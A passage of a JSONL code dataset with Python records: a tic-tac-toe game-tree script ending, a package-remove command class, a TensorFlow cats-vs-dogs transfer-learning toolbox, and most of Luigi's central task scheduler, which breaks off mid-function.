print(nextNode.TotalNumVisit)\n nextNode.TicTacToe.print_board()\n currNode = nextNode\n if currNode.TicTacToe.draw:\n print(\"Match is Drawn\")\n else:\n if currNode.TicTacToe.moveCnt & 1:\n print(\"First Player won\")\n else:\n print(\"Second Player won\")\n\nif __name__==\"__main__\":\n main()\n","sub_path":"Day2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"155906371","text":"import argparse\n\nfrom .base import BaseOperation\n\n\nclass Remove(BaseOperation):\n\tdef run(self, argv):\n\t\targs = self._parse_arguments(argv)\n\n\t\tif args.targets:\n\t\t\tself.remove(args.targets, args)\n\n\tdef remove(self, targets, args):\n\t\ttargets = self.package_manager.resolve_names(targets, local=True)\n\t\tself.package_manager.remove(targets, recursive=args.recursive, noconfirm=self.global_args.noconfirm)\n\n\tdef _parse_arguments(self, argv):\n\t\tparser = argparse.ArgumentParser(prog='confiles', add_help=False, usage='%(prog)s -R [options]')\n\n\t\tparser.add_argument('-s', '--recursive', action='store_true')\n\n\t\tparser.add_argument('-h', '--help', action='store_true')\n\n\t\tparser.add_argument('targets', nargs='*')\n\n\t\targs = parser.parse_args(argv)\n\n\t\tif args.help:\n\t\t\tparser.print_help()\n\t\t\texit()\n\n\t\treturn args\n","sub_path":"confiles/operation/remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"151567072","text":"# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nimport os\n\n\nimport io\nimport itertools\nfrom packaging import version\n\n\nfrom tensorflow import keras\nfrom tensorflow.keras import models\n\nfrom PIL.Image import *\nimport urllib.request\n\nimport numpy as np\nimport sklearn.metrics\n\nprint('Hi')\nprint(tf.__version__)\n\n\ndef show_images(train_dataset, class_names):\n \n\n plt.figure(figsize=(10, 10))\n\n for images, labels in train_dataset.take(1):\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(class_names[labels[i]])\n plt.axis(\"off\")\n\n\ndef show_augmented_datas(train_dataset):\n for image, _ in train_dataset.take(1):\n plt.figure(figsize=(10, 10))\n first_image = image[0]\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n augmented_image = data_augmentation(tf.expand_dims(first_image, 0))\n plt.imshow(augmented_image[0] / 255)\n plt.axis('off')\n\n\ndef data_augmentation():\n data_augmentation = tf.keras.Sequential([\n tf.keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n ])\n\n return data_augmentation\n\n\ndef load_dataset(url, BATCH_SIZE, IMG_SIZE):\n path_to_zip = tf.keras.utils.get_file(\n 'cats_and_dogs.zip', origin=url, extract=True)\n\n PATH = os.path.join(os.path.dirname(path_to_zip), 'cats_and_dogs_filtered')\n\n train_dir = os.path.join(PATH, 'train')\n\n validation_dir = os.path.join(PATH, 'validation')\n\n train_dataset = image_dataset_from_directory(train_dir,\n shuffle=True,\n batch_size=BATCH_SIZE,\n image_size=IMG_SIZE)\n\n validation_dataset = image_dataset_from_directory(validation_dir,\n shuffle=True,\n batch_size=BATCH_SIZE,\n image_size=IMG_SIZE)\n class_names = train_dataset.class_names\n show_images(train_dataset, class_names)\n\n val_batches = tf.data.experimental.cardinality(validation_dataset)\n test_dataset = validation_dataset.take(val_batches // 5)\n validation_dataset = validation_dataset.skip(val_batches // 5)\n\n AUTOTUNE = tf.data.AUTOTUNE\n\n train_dataset = train_dataset.prefetch(buffer_size=AUTOTUNE)\n validation_dataset = validation_dataset.prefetch(buffer_size=AUTOTUNE)\n test_dataset = test_dataset.prefetch(buffer_size=AUTOTUNE)\n\n return (train_dataset, validation_dataset, test_dataset, class_names)\n\n\ndef create_model(train_dataset, IMG_SIZE):\n data_augmentation = tf.keras.Sequential([\n tf.keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n ])\n\n preprocess_input = tf.keras.applications.mobilenet_v2.preprocess_input\n\n rescale = tf.keras.layers.experimental.preprocessing.Rescaling(\n 1./127.5, offset=-1)\n\n # Create the base model from the pre-trained model MobileNet V2\n IMG_SHAPE = IMG_SIZE + (3,)\n base_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,\n include_top=False,\n weights='imagenet')\n\n image_batch, label_batch = next(iter(train_dataset))\n feature_batch = base_model(image_batch)\n print(feature_batch.shape)\n\n # Freeze the pre-trained model weights\n base_model.trainable = True\n\n # Trainable classification head\n maxpool_layer = tf.keras.layers.GlobalMaxPooling2D()\n #global_average_layer = tf.keras.layers.GlobalAveragePooling2D()\n feature_batch_average = maxpool_layer(feature_batch)\n print(feature_batch_average.shape)\n\n prediction_layer = tf.keras.layers.Dense(1)\n prediction_batch = prediction_layer(feature_batch_average)\n print(prediction_batch.shape)\n\n # Let's take a look to see how many layers are in the base model\n print(\"Number of layers in the base model: \", len(base_model.layers))\n\n # Fine-tune from this layer onwards\n fine_tune_at = 100\n\n # Freeze all the layers before the `fine_tune_at` layer\n for layer in base_model.layers[:fine_tune_at]:\n layer.trainable = False\n\n # Layer classification head with feature detector\n\n inputs = tf.keras.layers.Input(shape=(160, 160, 3))\n x = data_augmentation(inputs)\n x = preprocess_input(x)\n x = base_model(x)\n x = maxpool_layer(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = prediction_layer(x)\n model = tf.keras.Model(inputs=[inputs], outputs=[outputs])\n\n learning_rate = 0.0001\n\n # Compile the model\n model.compile(optimizer=tf.keras.optimizers.RMSprop(lr=learning_rate),\n loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),\n metrics=['accuracy']\n )\n\n model.summary()\n return model\n\n\ndef evaluate_model(data, model):\n loss, accuracy = model.evaluate(data)\n return (loss, accuracy)\n\ndef load_model(modelfile):\n new_model = tf.keras.models.load_model(modelfile)\n return new_model\n\n\ndef test_model(data, model, class_names):\n #Retrieve a batch of images from the test set\n image_batch, label_batch = data.as_numpy_iterator().next()\n predictions = model.predict_on_batch(image_batch).flatten()\n\n \n # Apply a sigmoid since our model returns logits\n pred = tf.nn.sigmoid(predictions)\n predictions = tf.where(pred < 0.5, 0, 1)\n\n print('Predictions:\\n', predictions.numpy())\n print('Labels:\\n', label_batch)\n\n plt.figure(figsize=(10, 10))\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(image_batch[i].astype(\"uint8\"))\n plt.title(class_names[predictions[i]])\n plt.axis(\"off\")\n\ndef img_test(img_path, model, class_names):\n im=urllib.request.urlretrieve(img_path, \"sample.png\")\n\n img = tf.keras.preprocessing.image.load_img(\"sample.png\", target_size=(160, 160))\n img_tensor = tf.keras.preprocessing.image.img_to_array(img)\n img_tensor = np.expand_dims(img_tensor, axis=0)\n img_tensor /= 255.\n plt.imshow(img_tensor[0])\n plt.show()\n print(img_tensor.shape)\n\n x = tf.keras.preprocessing.image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])\n classes = model.predict_on_batch(images).flatten()\n\n # Apply a sigmoid since our model returns logits\n predictions = tf.nn.sigmoid(classes)\n predictions = tf.where(classes < 0.5, 0, 1)\n\n print('Predictions:\\n', predictions.numpy())\n print(\"Predicted class is:\",class_names[predictions[0]])","sub_path":"toolbox.py","file_name":"toolbox.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"134078419","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2012-2015 Spotify AB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\nThe system for scheduling tasks and executing them in order.\nDeals with dependencies, priorities, resources, etc.\nThe :py:class:`~luigi.worker.Worker` pulls tasks from the scheduler (usually over the REST interface) and executes them.\nSee :doc:`/central_scheduler` for more info.\n\"\"\"\n\nimport collections\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\nimport datetime\nimport functools\nimport itertools\nimport logging\nimport os\nimport time\n\nfrom luigi import six\n\nfrom luigi import configuration\nfrom luigi import notifications\nfrom luigi import parameter\nfrom luigi import task_history as history\nfrom luigi.task_status import DISABLED, DONE, FAILED, PENDING, RUNNING, SUSPENDED, UNKNOWN\nfrom luigi.task import Config\n\nlogger = logging.getLogger(\"luigi.server\")\n\n\nclass Scheduler(object):\n \"\"\"\n Abstract base class.\n\n Note that the methods all take string arguments, not Task objects...\n \"\"\"\"\"\n add_task = NotImplemented\n get_work = NotImplemented\n ping = NotImplemented\n\nUPSTREAM_RUNNING = 'UPSTREAM_RUNNING'\nUPSTREAM_MISSING_INPUT = 'UPSTREAM_MISSING_INPUT'\nUPSTREAM_FAILED = 'UPSTREAM_FAILED'\nUPSTREAM_DISABLED = 'UPSTREAM_DISABLED'\n\nUPSTREAM_SEVERITY_ORDER = (\n '',\n UPSTREAM_RUNNING,\n UPSTREAM_MISSING_INPUT,\n UPSTREAM_FAILED,\n UPSTREAM_DISABLED,\n)\nUPSTREAM_SEVERITY_KEY = UPSTREAM_SEVERITY_ORDER.index\nSTATUS_TO_UPSTREAM_MAP = {\n FAILED: UPSTREAM_FAILED,\n RUNNING: UPSTREAM_RUNNING,\n PENDING: UPSTREAM_MISSING_INPUT,\n DISABLED: UPSTREAM_DISABLED,\n}\n\n\nclass scheduler(Config):\n # TODO(erikbern): the config_path is needed for backwards compatilibity. We should drop the compatibility\n # at some point (in particular this would force users to replace all dashes with underscores in the config)\n retry_delay = parameter.FloatParameter(default=900.0)\n remove_delay = parameter.FloatParameter(default=600.0)\n worker_disconnect_delay = parameter.FloatParameter(default=60.0)\n state_path = parameter.Parameter(default='/var/lib/luigi-server/state.pickle')\n\n # Jobs are disabled if we see more than disable_failures failures in disable_window seconds.\n # These disables last for disable_persist seconds.\n disable_window = parameter.IntParameter(default=3600,\n config_path=dict(section='scheduler', name='disable-window-seconds'))\n disable_failures = parameter.IntParameter(default=None,\n config_path=dict(section='scheduler', name='disable-num-failures'))\n disable_hard_timeout = parameter.IntParameter(default=None,\n config_path=dict(section='scheduler', name='disable-hard-timeout'))\n disable_persist = parameter.IntParameter(default=86400,\n config_path=dict(section='scheduler', name='disable-persist-seconds'))\n max_shown_tasks = parameter.IntParameter(default=100000)\n prune_done_tasks = parameter.BoolParameter(default=False)\n\n record_task_history = parameter.BoolParameter(default=False)\n record_task_history_sqs = parameter.BoolParameter(default=False,\n config_path=dict(section='scheduler', name='record_task_history_sqs'))\n\n visualization_graph = parameter.Parameter(default=\"svg\", config_path=dict(section='scheduler', name='visualization-graph'))\n\n\ndef fix_time(x):\n # Backwards compatibility for a fix in Dec 2014. Prior to the fix, pickled state might store datetime objects\n # Let's remove this function soon\n if isinstance(x, datetime.datetime):\n return time.mktime(x.timetuple())\n else:\n return x\n\n\nclass Failures(object):\n \"\"\"\n This class tracks the number of failures in a given time window.\n\n Failures added are marked with the current timestamp, and this class counts\n the number of failures in a sliding time window ending at the present.\n \"\"\"\n\n def __init__(self, window):\n \"\"\"\n Initialize with the given window.\n\n :param window: how long to track failures for, as a float (number of seconds).\n \"\"\"\n self.window = window\n self.failures = collections.deque()\n self.first_failure_time = None\n\n def add_failure(self):\n \"\"\"\n Add a failure event with the current timestamp.\n \"\"\"\n failure_time = time.time()\n\n if not self.first_failure_time:\n self.first_failure_time = failure_time\n\n self.failures.append(failure_time)\n\n def num_failures(self):\n \"\"\"\n Return the number of failures in the window.\n \"\"\"\n min_time = time.time() - self.window\n\n while self.failures and fix_time(self.failures[0]) < min_time:\n self.failures.popleft()\n\n return len(self.failures)\n\n def clear(self):\n \"\"\"\n Clear the failure queue.\n \"\"\"\n self.failures.clear()\n\n\ndef _get_default(x, default):\n if x is not None:\n return x\n else:\n return default\n\n\nclass Task(object):\n\n def __init__(self, task_id, status, deps, resources=None, priority=0, family='', module=None,\n params=None, disable_failures=None, disable_window=None, disable_hard_timeout=None):\n self.id = task_id\n self.stakeholders = set() # workers ids that are somehow related to this task (i.e. don't prune while any of these workers are still active)\n self.workers = set() # workers ids that can perform task - task is 'BROKEN' if none of these workers are active\n if deps is None:\n self.deps = set()\n else:\n self.deps = set(deps)\n self.status = status # PENDING, RUNNING, FAILED or DONE\n self.time = time.time() # Timestamp when task was first added\n self.retry = None\n self.remove = None\n self.worker_running = None # the worker id that is currently running the task or None\n self.time_running = None # Timestamp when picked up by worker\n self.expl = None\n self.priority = priority\n self.resources = _get_default(resources, {})\n self.family = family\n self.module = module\n self.params = _get_default(params, {})\n self.disable_failures = disable_failures\n self.disable_hard_timeout = disable_hard_timeout\n self.failures = Failures(disable_window)\n self.scheduler_disable_time = None\n\n def __repr__(self):\n return \"Task(%r)\" % vars(self)\n\n def add_failure(self):\n self.failures.add_failure()\n\n def has_excessive_failures(self):\n\n excessive_failures = False\n\n if (self.failures.first_failure_time is not None and\n self.disable_hard_timeout):\n if (time.time() >= self.failures.first_failure_time +\n self.disable_hard_timeout):\n excessive_failures = True\n\n if self.failures.num_failures() >= self.disable_failures:\n excessive_failures = True\n\n return excessive_failures\n\n def can_disable(self):\n return (self.disable_failures is not None or\n self.disable_hard_timeout is not None)\n\n\nclass Worker(object):\n \"\"\"\n Structure for tracking worker activity and keeping their references.\n \"\"\"\n\n def __init__(self, worker_id, last_active=None):\n self.id = worker_id\n self.reference = None # reference to the worker in the real world. (Currently a dict containing just the host)\n self.last_active = last_active # seconds since epoch\n self.started = time.time() # seconds since epoch\n self.info = {}\n\n def add_info(self, info):\n self.info.update(info)\n\n def update(self, worker_reference):\n if worker_reference:\n self.reference = worker_reference\n self.last_active = time.time()\n\n def prune(self, config):\n # Delete workers that haven't said anything for a while (probably killed)\n if self.last_active + config.worker_disconnect_delay < time.time():\n return True\n\n @property\n def assistant(self):\n return self.info.get('assistant', False)\n\n def __str__(self):\n return self.id\n\n\nclass SimpleTaskState(object):\n \"\"\"\n Keep track of the current state and handle persistance.\n\n The point of this class is to enable other ways to keep state, eg. by using a database\n These will be implemented by creating an abstract base class that this and other classes\n inherit from.\n \"\"\"\n\n def __init__(self, state_path):\n self._state_path = state_path\n self._tasks = {} # map from id to a Task object\n self._status_tasks = collections.defaultdict(dict)\n self._active_workers = {} # map from id to a Worker object\n\n def dump(self):\n state = (self._tasks, self._active_workers)\n try:\n with open(self._state_path, 'wb') as fobj:\n pickle.dump(state, fobj)\n except IOError:\n logger.warning(\"Failed saving scheduler state\", exc_info=1)\n else:\n logger.info(\"Saved state in %s\", self._state_path)\n\n # prone to lead to crashes when old state is unpickled with updated code. TODO some kind of version control?\n def load(self):\n if os.path.exists(self._state_path):\n logger.info(\"Attempting to load state from %s\", self._state_path)\n try:\n with open(self._state_path, 'rb') as fobj:\n state = pickle.load(fobj)\n except BaseException:\n logger.exception(\"Error when loading state. Starting from clean slate.\")\n return\n\n self._tasks, self._active_workers = state\n self._status_tasks = collections.defaultdict(dict)\n for task in six.itervalues(self._tasks):\n self._status_tasks[task.status][task.id] = task\n\n # Convert from old format\n # TODO: this is really ugly, we need something more future-proof\n # Every time we add an attribute to the Worker class, this code needs to be updated\n for k, v in six.iteritems(self._active_workers):\n if isinstance(v, float):\n self._active_workers[k] = Worker(worker_id=k, last_active=v)\n else:\n logger.info(\"No prior state file exists at %s. Starting with clean slate\", self._state_path)\n\n def get_active_tasks(self, status=None):\n if status:\n for task in six.itervalues(self._status_tasks[status]):\n yield task\n else:\n for task in six.itervalues(self._tasks):\n yield task\n\n def get_running_tasks(self):\n return six.itervalues(self._status_tasks[RUNNING])\n\n def get_pending_tasks(self):\n return itertools.chain.from_iterable(six.itervalues(self._status_tasks[status])\n for status in [PENDING, RUNNING])\n\n def get_task(self, task_id, default=None, setdefault=None):\n if setdefault:\n task = self._tasks.setdefault(task_id, setdefault)\n self._status_tasks[task.status][task.id] = task\n return task\n else:\n return self._tasks.get(task_id, default)\n\n def has_task(self, task_id):\n return task_id in self._tasks\n\n def re_enable(self, task, config=None):\n task.scheduler_disable_time = None\n task.failures.clear()\n if config:\n self.set_status(task, FAILED, config)\n task.failures.clear()\n\n def set_status(self, task, new_status, config=None):\n if new_status == FAILED:\n assert config is not None\n\n # not sure why we have SUSPENDED, as it can never be set\n if new_status == SUSPENDED:\n new_status = PENDING\n\n if new_status == DISABLED and task.status == RUNNING:\n return\n\n if task.status == DISABLED:\n if new_status == DONE:\n self.re_enable(task)\n\n # don't allow workers to override a scheduler disable\n elif task.scheduler_disable_time is not None:\n return\n\n if new_status == FAILED and task.can_disable():\n task.add_failure()\n if task.has_excessive_failures():\n task.scheduler_disable_time = time.time()\n new_status = DISABLED\n notifications.send_error_email(\n 'Luigi Scheduler: DISABLED {task} due to excessive failures'.format(task=task.id),\n '{task} failed {failures} times in the last {window} seconds, so it is being '\n 'disabled for {persist} seconds'.format(\n failures=config.disable_failures,\n task=task.id,\n window=config.disable_window,\n persist=config.disable_persist,\n ))\n elif new_status == DISABLED:\n task.scheduler_disable_time = None\n\n self._status_tasks[task.status].pop(task.id)\n self._status_tasks[new_status][task.id] = task\n task.status = new_status\n\n def prune(self, task, config, assistants):\n remove = False\n\n # Mark tasks with no remaining active stakeholders for deletion\n if not task.stakeholders:\n if task.remove is None:\n logger.info(\"Task %r has stakeholders %r but none remain connected -> will remove \"\n \"task in %s seconds\", task.id, task.stakeholders, config.remove_delay)\n task.remove = time.time() + config.remove_delay\n\n # If a running worker disconnects, tag all its jobs as FAILED and subject it to the same retry logic\n if task.status == RUNNING and task.worker_running and task.worker_running not in task.stakeholders | assistants:\n logger.info(\"Task %r is marked as running by disconnected worker %r -> marking as \"\n \"FAILED with retry delay of %rs\", task.id, task.worker_running,\n config.retry_delay)\n task.worker_running = None\n self.set_status(task, FAILED, config)\n task.retry = time.time() + config.retry_delay\n\n # Re-enable task after the disable time expires\n if task.status == DISABLED and task.scheduler_disable_time:\n if time.time() - fix_time(task.scheduler_disable_time) > config.disable_persist:\n self.re_enable(task, config)\n\n # Remove tasks that have no stakeholders\n if task.remove and time.time() > task.remove:\n logger.info(\"Removing task %r (no connected stakeholders)\", task.id)\n remove = True\n\n # Reset FAILED tasks to PENDING if max timeout is reached, and retry delay is >= 0\n if task.status == FAILED and config.retry_delay >= 0 and task.retry < time.time():\n self.set_status(task, PENDING, config)\n\n return remove\n\n def inactivate_tasks(self, delete_tasks):\n # The terminology is a bit confusing: we used to \"delete\" tasks when they became inactive,\n # but with a pluggable state storage, you might very well want to keep some history of\n # older tasks as well. That's why we call it \"inactivate\" (as in the verb)\n for task in delete_tasks:\n task_obj = self._tasks.pop(task)\n self._status_tasks[task_obj.status].pop(task)\n\n def get_active_workers(self, last_active_lt=None):\n for worker in six.itervalues(self._active_workers):\n if last_active_lt is not None and worker.last_active >= last_active_lt:\n continue\n yield worker\n\n def get_assistants(self, last_active_lt=None):\n return filter(lambda w: w.assistant, self.get_active_workers(last_active_lt))\n\n def get_worker_ids(self):\n return self._active_workers.keys() # only used for unit tests\n\n def get_worker(self, worker_id):\n return self._active_workers.setdefault(worker_id, Worker(worker_id))\n\n def inactivate_workers(self, delete_workers):\n # Mark workers as inactive\n for worker in delete_workers:\n self._active_workers.pop(worker)\n\n # remove workers from tasks\n for task in self.get_active_tasks():\n task.stakeholders.difference_update(delete_workers)\n task.workers.difference_update(delete_workers)\n\n def get_necessary_tasks(self):\n necessary_tasks = set()\n for task in self.get_active_tasks():\n if task.status not in (DONE, DISABLED) or \\\n getattr(task, 'scheduler_disable_time', None) is not None:\n necessary_tasks.update(task.deps)\n necessary_tasks.add(task.id)\n return necessary_tasks\n\n\nclass CentralPlannerScheduler(Scheduler):\n \"\"\"\n Async scheduler that can handle multiple workers, etc.\n\n Can be run locally or on a server (using RemoteScheduler + server.Server).\n \"\"\"\n\n def __init__(self, config=None, resources=None, task_history_impl=None, **kwargs):\n \"\"\"\n Keyword Arguments:\n :param config: an object of class \"scheduler\" or None (in which the global instance will be used)\n :param resources: a dict of str->int constraints\n :param task_history_override: ignore config and use this object as the task history\n \"\"\"\n self._config = config or scheduler(**kwargs)\n self._state = SimpleTaskState(self._config.state_path)\n\n if task_history_impl:\n self._task_history = task_history_impl\n elif self._config.record_task_history:\n from luigi import db_task_history # Needs sqlalchemy, thus imported here\n self._task_history = db_task_history.DbTaskHistory()\n elif self._config.record_task_history_sqs:\n import sqs_history # Needs boto, dateutil, thus imported here\n self._task_history = sqs_history.SqsTaskHistory()\n else:\n self._task_history = history.NopHistory()\n\n self._resources = resources or configuration.get_config().getintdict('resources') # TODO: Can we make this a Parameter?\n self._make_task = functools.partial(\n Task, disable_failures=self._config.disable_failures,\n disable_hard_timeout=self._config.disable_hard_timeout,\n disable_window=self._config.disable_window)\n\n def load(self):\n self._state.load()\n\n def dump(self):\n self._state.dump()\n\n def prune(self):\n logger.info(\"Starting pruning of task graph\")\n remove_workers = []\n for worker in self._state.get_active_workers():\n if worker.prune(self._config):\n logger.info(\"Worker %s timed out (no contact for >=%ss)\", worker, self._config.worker_disconnect_delay)\n remove_workers.append(worker.id)\n\n self._state.inactivate_workers(remove_workers)\n\n assistant_ids = set(w.id for w in self._state.get_assistants())\n remove_tasks = []\n\n if assistant_ids:\n necessary_tasks = self._state.get_necessary_tasks()\n else:\n necessary_tasks = ()\n\n for task in self._state.get_active_tasks():\n if task.id not in necessary_tasks and self._state.prune(task, self._config, assistant_ids):\n remove_tasks.append(task.id)\n\n self._state.inactivate_tasks(remove_tasks)\n\n logger.info(\"Done pruning task graph\")\n\n def update(self, worker_id, worker_reference=None):\n \"\"\"\n Keep track of whenever the worker was last active.\n \"\"\"\n worker = self._state.get_worker(worker_id)\n worker.update(worker_reference)\n\n def _update_priority(self, task, prio, worker):\n \"\"\"\n Update priority of the given task.\n\n Priority can only be increased.\n If the task doesn't exist, a placeholder task is created to preserve priority when the task is later scheduled.\n \"\"\"\n task.priority = prio = max(prio, task.priority)\n for dep in task.deps or []:\n t = self._state.get_task(dep)\n if t is not None and prio > t.priority:\n self._update_priority(t, prio, worker)\n\n def add_task(self, task_id=None, status=PENDING, runnable=True,\n deps=None, new_deps=None, expl=None, resources=None,\n priority=0, family='', module=None, params=None,\n assistant=False, **kwargs):\n \"\"\"\n * add task identified by task_id if it doesn't exist\n * if deps is not None, update dependency list\n * update status of task\n * add additional workers/stakeholders\n * update priority when needed\n \"\"\"\n worker_id = kwargs['worker']\n self.update(worker_id)\n\n task = self._state.get_task(task_id, setdefault=self._make_task(\n task_id=task_id, status=PENDING, deps=deps, resources=resources,\n priority=priority, family=family, module=module, params=params))\n\n # for setting priority, we'll sometimes create tasks with unset family and params\n if not task.family:\n task.family = family\n if not getattr(task, 'module', None):\n task.module = module\n if not task.params:\n task.params = _get_default(params, {})\n\n if task.remove is not None:\n task.remove = None # unmark task for removal so it isn't removed after being added\n\n if not (task.status == RUNNING and status == PENDING):\n # don't allow re-scheduling of task while it is running, it must either fail or succeed first\n self._update_task_history(task_id, status, worker_id=worker_id)\n self._state.set_status(task, PENDING if status == SUSPENDED else status, self._config)\n\n if status == FAILED:\n task.retry = time.time() + self._config.retry_delay\n\n if deps is not None:\n task.deps = set(deps)\n\n if new_deps is not None:\n task.deps.update(new_deps)\n\n if resources is not None:\n task.resources = resources\n\n if not assistant:\n task.stakeholders.add(worker_id)\n\n # Task dependencies might not exist yet. Let's create dummy tasks for them for now.\n # Otherwise the task dependencies might end up being pruned if scheduling takes a long time\n for dep in task.deps or []:\n t = self._state.get_task(dep, setdefault=self._make_task(task_id=dep, status=UNKNOWN, deps=None, priority=priority))\n t.stakeholders.add(worker_id)\n\n self._update_priority(task, priority, worker_id)\n\n if runnable:\n task.workers.add(worker_id)\n\n if expl is not None:\n task.expl = expl\n\n def add_worker(self, worker, info, **kwargs):\n self._state.get_worker(worker).add_info(info)\n\n def update_resources(self, **resources):\n if self._resources is None:\n self._resources = {}\n self._resources.update(resources)\n\n def _has_resources(self, needed_resources, used_resources):\n if needed_resources is None:\n return True\n\n available_resources = self._resources or {}\n for resource, amount in six.iteritems(needed_resources):\n if amount + used_resources[resource] > available_resources.get(resource, 1):\n return False\n return True\n\n def _used_resources(self):\n used_resources = collections.defaultdict(int)\n if self._resources is not None:\n for task in self._state.get_active_tasks():\n if task.status == RUNNING and task.resources:\n for resource, amount in six.iteritems(task.resources):\n used_resources[resource] += amount\n return used_resources\n\n def _rank(self):\n \"\"\"\n Return worker's rank function for task scheduling.\n\n :return:\n \"\"\"\n dependents = collections.defaultdict(int)\n\n def not_done(t):\n task = self._state.get_task(t, default=None)\n return task is None or task.status != DONE\n for task in self._state.get_pending_tasks():\n if task.status != DONE:\n deps = list(filter(not_done, task.deps))\n inverse_num_deps = 1.0 / max(len(deps), 1)\n for dep in deps:\n dependents[dep] += inverse_num_deps\n\n return lambda task: (task.priority, dependents[task.id], -task.time)\n\n def _schedulable(self, task):\n if task.status != PENDING:\n return False\n for dep in task.deps:\n dep_task = self._state.get_task(dep, default=None)\n if dep_task is None or dep_task.status != DONE:\n return False\n return True\n\n def get_work(self, host=None, assistant=False, **kwargs):\n # TODO: remove any expired nodes\n\n # Algo: iterate over all nodes, find the highest priority node no dependencies and available\n # resources.\n\n # Resource checking looks both at currently available resources and at which resources would\n # be available if all running tasks died and we rescheduled all workers greedily. We do both\n # checks in order to prevent a worker with many low-priority tasks from starving other\n # workers with higher priority tasks that share the same resources.\n\n # TODO: remove tasks that can't be done, figure out if the worker has absolutely\n # nothing it can wait for\n\n worker_id = kwargs['worker']\n # Return remaining tasks that have no FAILED descendents\n self.update(worker_id, {'host': host})\n if assistant:\n self.add_worker(worker_id, [('assistant', assistant)])\n best_task = None\n locally_pending_tasks = 0\n running_tasks = []\n upstream_table = {}\n\n used_resources = self._used_resources()\n greedy_resources = collections.defaultdict(int)\n n_unique_pending = 0\n greedy_workers = dict((worker.id, worker.info.get('workers', 1))\n for worker in self._state.get_active_workers())\n\n tasks = list(self._state.get_pending_tasks())\n tasks.sort(key=self._rank(), reverse=True)\n\n for task in tasks:\n upstream_status = self._upstream_status(task.id, upstream_table)\n in_workers = (assistant and task.workers) or worker_id in task.workers\n if task.status == RUNNING and in_workers:\n # Return a list of currently running tasks to the client,\n # makes it easier to troubleshoot\n other_worker = self._state.get_worker(task.worker_running)\n more_info = {'task_id': task.id, 'worker': str(other_worker)}\n if other_worker is not None:\n more_info.update(other_worker.info)\n running_tasks.append(more_info)\n\n if task.status == PENDING and in_workers and upstream_status != UPSTREAM_DISABLED:\n locally_pending_tasks += 1\n if len(task.workers) == 1 and not assistant:\n n_unique_pending += 1\n\n if task.status == RUNNING and (task.worker_running in greedy_workers):\n greedy_workers[task.worker_running] -= 1\n for resource, amount in six.iteritems((task.resources or {})):\n greedy_resources[resource] += amount\n\n if not best_task and self._schedulable(task) and self._has_resources(task.resources, greedy_resources):\n if in_workers and self._has_resources(task.resources, used_resources):\n best_task = task\n else:\n workers = itertools.chain(task.workers, [worker_id]) if assistant else task.workers\n for task_worker in workers:\n if greedy_workers.get(task_worker, 0) > 0:\n # use up a worker\n greedy_workers[task_worker] -= 1\n\n # keep track of the resources used in greedy scheduling\n for resource, amount in six.iteritems((task.resources or {})):\n greedy_resources[resource] += amount\n\n break\n\n reply = {'n_pending_tasks': locally_pending_tasks,\n 'running_tasks': running_tasks,\n 'task_id': None,\n 'n_unique_pending': n_unique_pending}\n\n if best_task:\n self._state.set_status(best_task, RUNNING, self._config)\n best_task.worker_running = worker_id\n best_task.time_running = time.time()\n self._update_task_history(best_task.id, RUNNING, host=host, worker_id=worker_id)\n\n reply['task_id'] = best_task.id\n reply['task_family'] = best_task.family\n reply['task_module'] = getattr(best_task, 'module', None)\n reply['task_params'] = best_task.params\n\n return reply\n\n def ping(self, **kwargs):\n worker_id = kwargs['worker']\n self.update(worker_id)\n\n def _upstream_status(self, task_id, upstream_status_table):\n if task_id in upstream_status_table:\n return upstream_status_table[task_id]\n elif self._state.has_task(task_id):\n task_stack = [task_id]\n\n while task_stack:\n dep_id = task_stack.pop()\n if self._state.has_task(dep_id):\n dep = self._state.get_task(dep_id)\n if dep_id not in upstream_status_table:\n if dep.status == PENDING and dep.deps:\n task_stack = task_stack + [dep_id] + list(dep.deps)\n upstream_status_table[dep_id] = '' # will be updated postorder\n else:\n dep_status = STATUS_TO_UPSTREAM_MAP.get(dep.status, '')\n upstream_status_table[dep_id] = dep_status\n elif upstream_status_table[dep_id] == '' and dep.deps:\n # This is the postorder update step when we set the\n # status based on the previously calculated child elements\n upstream_status = [upstream_status_table.get(task_id, '') for task_id in dep.deps]\n upstream_status.append('') # to handle empty list\n status = max(upstream_status, key=UPSTREAM_SEVERITY_KEY)\n upstream_status_table[dep_id] = status\n return upstream_status_table[dep_id]\n\n def _serialize_task(self, task_id, include_deps=True):\n task = self._state.get_task(task_id)\n ret = {\n 'status': task.status,\n 'workers': list(task.workers),\n 'worker_running': task.worker_running,\n 'time_running': getattr(task, \"time_running\", None),\n 'start_time': task.time,\n 'params': task.params,\n 'name': task.family,\n 'priority': task.priority,\n 'resources': task.resources,\n }\n if task.status == 